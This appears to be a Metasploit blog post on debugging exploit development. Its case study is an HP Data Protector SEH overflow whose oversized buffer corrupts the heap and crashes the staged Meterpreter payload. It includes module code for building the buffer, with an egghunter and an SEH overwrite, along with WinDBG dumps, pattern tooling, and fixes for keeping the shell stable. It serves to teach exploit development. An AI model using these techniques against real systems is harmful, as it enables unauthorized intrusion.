Last year at BSides Vegas, James Lee (egypt) and David Rude (bannedit) gave a presentation called "Long Beard's Guide to Exploit Dev".  During the talk, James said one thing that I'll never forget: "exploit development is never an easy task, because pretty much every step you do -- finding the offset, finding a return value, using a ROP gadget, etc -- could lead to a failure." Ain't that the truth!  But here's the thing: exploits don't just fail before you pop a shell, they can also fail WHILE you're getting a shell... and that's where my story is.

Let's say you're writing an exploit.  You've done all the hard work to put it all together: you spent days in a debugger doing some decent root cause analysis for the bug, you found all the bad characters, you bypassed memory protections such as /GS and SafeSEH, you ROP'd it like a ROP star, and you bypassed ASLR like a boss.  Your friends praise you for the accomplishment, some people might even call your exploit "sophisticated".... and then all of a sudden, this is all the "code execution" you get out of your awesome exploit:

msf  exploit(0day) > exploit
[*] Server started.
[*] Sending request to 10.0.1.4:80...
[*] Leaked address: 0x61990000
[*] Sending final payload...
[*] Sending stage (752128 bytes) to 10.0.1.4

"Hey, WTH?", you say.  For some reason the exploit fails after you've sent the second stage to the vulnerable application, and then the server crashes (this is the key behavior).  You fire the module a couple of times just to make sure, but same thing.  Your shell keeps slipping away from your fingertips... what a nightmare!  This is a pretty nasty problem, because the root cause most likely comes from the exploit.  It also can be a hassle to fix, and you will see why when you see one of the solutions in the end.  But for now, I should probably explain why this is happening.

We ran into the same problem recently while developing the exploit for HP Data Protector, so I'll use that as a case study.  During the later stages of developing that module, the buffer was crafted this way:

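print_status("Using egghunter with checksum")
# generate_egghunter returns the hunter stub and the tagged egg (tag + payload)
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true, :eggtag => 'w00t' })
my_payload = egg
# Pad up to the offset of the SEH record
my_payload << "A"*(target['Offset']-my_payload.length)
# Overwrite the SEH record, then place the egghunter right after it
my_payload << generate_seh_record(target.ret)
my_payload << hunter
# Pad the whole buffer out to 4080 bytes
my_payload << "A"*(4080-my_payload.length)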

As you can see, the max buffer size is 4080 bytes -- this is key.  When we fire up this module, we see the same "Sending stage" message as before, and then the target hits this crash:

 
0:008> r
eax=03f664d4 ebx=3743fde1 ecx=0000c9ed edx=000c1000 esi=3743fdc9 edi=03f501a4
eip=7c952d6b esp=019ed278 ebp=019ed2ec iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlQueryProcessHeapInformation+0x2ba:
7c952d6b 8b4e14          mov     ecx,dword ptr [esi+14h] ds:0023:3743fddd=????????

0:008> k
ChildEBP RetAddr  
019ed2ec 7c953341 ntdll!RtlQueryProcessHeapInformation+0x2ba
019ed348 7c864afe ntdll!RtlQueryProcessDebugInformation+0x1ee
019ed36c 03bd7e23 kernel32!Heap32First+0x48
WARNING: Frame IP not in any known module. Following frames may be wrong.
019edc2c 7c802600 +0x3bd7e22
019edc7c 00000000 kernel32!WaitForSingleObjectEx+0xd8

We should probably point out that the value in ESI actually comes from our user-supplied string.  We were able to determine this because when we tested the module again with pattern_create() instead of a long string of "A"s, pattern_offset.rb was able to locate the value... exactly 38 bytes after the egghunter.  So the above WinDBG log shows that after the staged payload delivery, there is some sort of heap corruption, and evidently our string has something to do with that.
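
If you haven't used the pattern tools before, the idea is that the pattern is built so that any four consecutive bytes identify their position, which lets a value seen in a register be mapped back to an offset in the buffer.  Here is a simplified, self-contained stand-in in Ruby.  It is not Metasploit's actual implementation; the method names only mirror the tools for readability, and the 38-byte lookup is an arbitrary illustration rather than the real crash value:

```ruby
# Simplified cyclic pattern: upper-case letter, lower-case letter, digit,
# repeated ("Aa0Aa1Aa2...") until +length+ bytes have been produced.
def pattern_create(length)
  buf = +""
  ('A'..'Z').each do |upper|
    ('a'..'z').each do |lower|
      ('0'..'9').each do |digit|
        buf << upper << lower << digit
        return buf[0, length] if buf.length >= length
      end
    end
  end
  buf[0, length]
end

# Look up a 32-bit register value (little-endian in memory) in the pattern.
# Returns the byte offset, or nil if the value is not part of the pattern.
def pattern_offset(pattern, value)
  pattern.b.index([value].pack('V'))
end

pattern = pattern_create(4080)

# Pretend a register held the four bytes found 38 bytes into the pattern.
register_value = pattern[38, 4].unpack1('V')
puts pattern_offset(pattern, register_value).inspect
```

A value that never appeared in the buffer comes back as nil, which is a quick way to tell whether a register is really under your control.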

Remember, this buffer overflow is supposed to be all stack smashing. But when we examined the memory more closely, comparing a non-crashing request against the crashing one, we found something interesting.  The following is the memory dump starting at the SEH record that we overwrite:

Stack from the healthy version of the exploit (the non-healthy version follows it):
0244ff9c d64d06eb
0244ffa0 66dd3e49 SE Handler
0244ffa4 ffca8166
0244ffa8 6a52420f
0244ffac 2ecd5802
0244ffb0 745a053c
0244ffb4 3077b8ef
0244ffb8 d7897430
0244ffbc afea75af
0244ffc0 3151e775
0244ffc4 02c031c9
0244ffc8 66410f04
0244ffcc 013df981
0244ffd0 043af575
0244ffd4 d175590f
0244ffd8 3077e7ff
0244ffdc ff007430
0244ffe0 7c839ac0 kernel32!_except_handler3
0244ffe4 7c80b720 kernel32!`string'+0x88
0244ffe8 00000000
0244ffec 00000000
0244fff0 00000000
0244fff4 1022db2c dpwinsup!Mbcsisupper+0x21d627
0244fff8 019d75a0
0244fffc 00000000 Stack
02450000 000000c1 starting here is the heap
02450004 0000017a
02450008 eeffeeff
0245000c 00001003
02450010 00000001
02450014 0000fe00
02450018 00100000
0245001c 00002000
02450020 00000200
02450024 00002000
02450028 00001f6d
0245002c 7ffdefff
02450030 06080019

Stack from the non-healthy version of the exploit:
0244ff9c d64d06eb
0244ffa0 66dd3e49 SE Handler
0244ffa4 ffca8166
0244ffa8 6a52420f
0244ffac 2ecd5802
0244ffb0 745a053c
0244ffb4 3077b8ef
0244ffb8 d7897430
0244ffbc afea75af
0244ffc0 3151e775
0244ffc4 02c031c9
0244ffc8 66410f04
0244ffcc 013df981
0244ffd0 043af575
0244ffd4 d175590f
0244ffd8 41414141
0244ffdc 41414141
0244ffe0 41414141
0244ffe4 41414141
0244ffe8 00000000
0244ffec 00000000
0244fff0 00000000
0244fff4 41414141
0244fff8 41414141
0244fffc 04141414 Still stack
02450000 41414141 starting here is the heap
02450004 41414141
02450008 41414141
0245000c 41414141
02450010 41414141
02450014 41414141
02450018 41414141
0245001c 41414141
02450020 41414141
02450024 41414141
02450028 41414141
0245002c 41414141
02450030 41414141

In case you haven't noticed, yes, while the exploit is overflowing the stack, it's also writing to the heap.  A simple !address command verifies this:
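
How little room there is becomes obvious once you subtract the two addresses from the dump.  A minimal Ruby sketch, using only addresses shown in the memory dump (the constant and method names are just for illustration):

```ruby
# Addresses taken from the memory dump above.
SEH_RECORD_ADDR = 0x0244ff9c  # start of the overwritten SEH record
HEAP_BASE       = 0x02450000  # first address where the heap begins

# Number of bytes that can be written starting at +addr+ before the
# write reaches +limit+.
def bytes_until(addr, limit)
  limit - addr
end

room = bytes_until(SEH_RECORD_ADDR, HEAP_BASE)
puts "Bytes from the SEH record to the heap: #{room} (0x#{room.to_s(16)})"
# prints "Bytes from the SEH record to the heap: 100 (0x64)"
```

So in this dump only 100 bytes separate the start of the SEH record from the heap, which is tiny compared to a buffer padded out to 4080 bytes.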


0:010> !address 0244fffc
     02350000 : 02440000 - 00010000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageStack
                    Pid.Tid  69a0.6ac4

0:010> !address 02450000
    02450000 : 02450000 - 00016000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   02450000
 

And the dt command shows what the corrupted _HEAP structure at 0x02450000 looks like:


     0:010> dt _HEAP 02450000
     ntdll!_HEAP
        +0x000 Entry            : _HEAP_ENTRY
        +0x008 Signature        : 0x41414141
        +0x00c Flags            : 0x41414141
        +0x010 ForceFlags       : 0x41414141
        +0x014 VirtualMemoryThreshold : 0x41414141
        +0x018 SegmentReserve   : 0x41414141
        +0x01c SegmentCommit    : 0x41414141
        +0x020 DeCommitFreeBlockThreshold : 0x41414141
        +0x024 DeCommitTotalFreeThreshold : 0x41414141
        +0x028 TotalFreeSize    : 0x41414141
        +0x02c MaximumAllocationSize : 0x41414141
        +0x030 ProcessHeapsListIndex : 0x4141
        +0x032 HeaderValidateLength : 0x4141
        +0x034 HeaderValidateCopy : 0x41414141 
        +0x038 NextAvailableTagIndex : 0x4141
        +0x03a MaximumTagIndex  : 0x4141
        +0x03c TagEntries       : 0x41414141 _HEAP_TAG_ENTRY
        +0x040 UCRSegments      : 0x41414141 _HEAP_UCR_SEGMENT
        +0x044 UnusedUnCommittedRanges : 0x41414141 _HEAP_UNCOMMMTTED_RANGE
        +0x048 AlignRound       : 0x41414141
        +0x04c AlignMask        : 0x41414141
        +0x050 VirtualAllocdBlocks : _LIST_ENTRY [ 0x41414141 - 0x41414141 ]
        +0x058 Segments         : [64] 0x41414141 _HEAP_SEGMENT
        +0x158 u                : __unnamed
        +0x168 u2               : __unnamed
        +0x16a AllocatorBackTraceIndex : 0x4141
        +0x16c NonDedicatedListLength : 0x41414141
        +0x170 LargeBlocksIndex : 0x41414141 
        +0x174 PseudoTagEntries : 0x41414141 _HEAP_PSEUDO_TAG_ENTRY
        +0x178 FreeLists        : [128] _LIST_ENTRY [ 0x41414141 - 0x41414141 ]
        +0x578 LockVariable     : (null) 
        +0x57c CommitRoutine    : (null) 
        +0x580 FrontEndHeap     : (null) 
        +0x584 FrontHeapLockCount : 0
        +0x586 FrontEndHeapType : 0 ''
        +0x587 LastSegmentIndex : 0 ''
 

When the payload uses the heap, that's when we get the crash.  Based on our data, this crash tends to happen after the handler completes transmitting the payload (that's after recv), when the Tool Help functions end up using the bad heap (CreateToolhelp32Snapshot -> kernel32.Heap32ListFirst -> Heap32First, in particular), causing our meterpreter to crash.  We have also seen other behaviors that lead to the crash, but they come down to much the same reason.

The Solutions

Now we know that in scenarios like this, the user-supplied buffer is highly likely to be the root cause of the problem.  In our case with HP Data Protector, the string is just way too long, and it's overwriting the heap.  We have seen a few proven solutions in the past, and here they are:

  • Avoid corrupting the heap by reducing your malicious string size.  This is the simplest fix and the one you should try first, but it may not always work for you because a smaller buffer may not even trigger the vulnerability you're exploiting.
  • Inject your payload somewhere else, where no heap is busted.  So far this technique has only been used once, and it was done by corelanc0d3r and lincoln.  This is similar to using the 'migrate' feature in meterpreter, except their injection routine runs before the actual Metasploit payload begins. You can read up more about this technique here.
  • Induce a heap pointer manually, for example: ms04_011_pct.rb
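
The first option amounts to capping the padding so the buffer ends before the heap begins.  Here is a rough sketch in plain Ruby, under loud assumptions: build_buffer, the 1024-byte offset, and the stand-in strings are all hypothetical and are not the HP Data Protector module's values.  The 100-byte limit is simply 0x02450000 - 0x0244ff9c from the dump above.

```ruby
# Build the overflow buffer, but never let it grow past +max_len+ bytes.
# Every argument is a placeholder: in a real module the egg, SEH record and
# hunter would come from generate_egghunter and generate_seh_record.
def build_buffer(egg:, seh_record:, hunter:, offset:, max_len:)
  buf = egg.b  # binary copy, so the caller's string is left untouched
  raise ArgumentError, "egg is longer than the SEH offset" if buf.length > offset

  buf << "A" * (offset - buf.length)  # pad up to the SEH record
  buf << seh_record << hunter
  if buf.length > max_len
    raise ArgumentError, "buffer needs #{buf.length} bytes, limit is #{max_len}"
  end

  buf << "A" * (max_len - buf.length)  # pad only up to the safe limit
end

offset       = 1024  # hypothetical offset of the SEH record in the buffer
room_on_stack = 100  # bytes from the SEH record to the heap in the dump

buf = build_buffer(
  egg:        "E" * 300,  # stand-in for the tagged payload
  seh_record: "S" * 8,    # stand-in for the 8-byte SEH record
  hunter:     "H" * 56,   # stand-in for the egghunter stub
  offset:     offset,
  max_len:    offset + room_on_stack
)
puts buf.length
```

Raising an error when the pieces don't fit under the limit is a deliberate choice: it is better for the module to refuse to fire than to silently send a buffer that tramples the heap again.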

And hopefully one of the above recommendations will do the trick for you.

By the way, in case you're interested in Metasploit module development, make sure to create your development setup, and then join the sweet action of the Metasploit Project.  GitHub and Redmine often reveal a lot about how a module is made, and every exploit tends to be a unique story -- great places to begin your exploit development journey!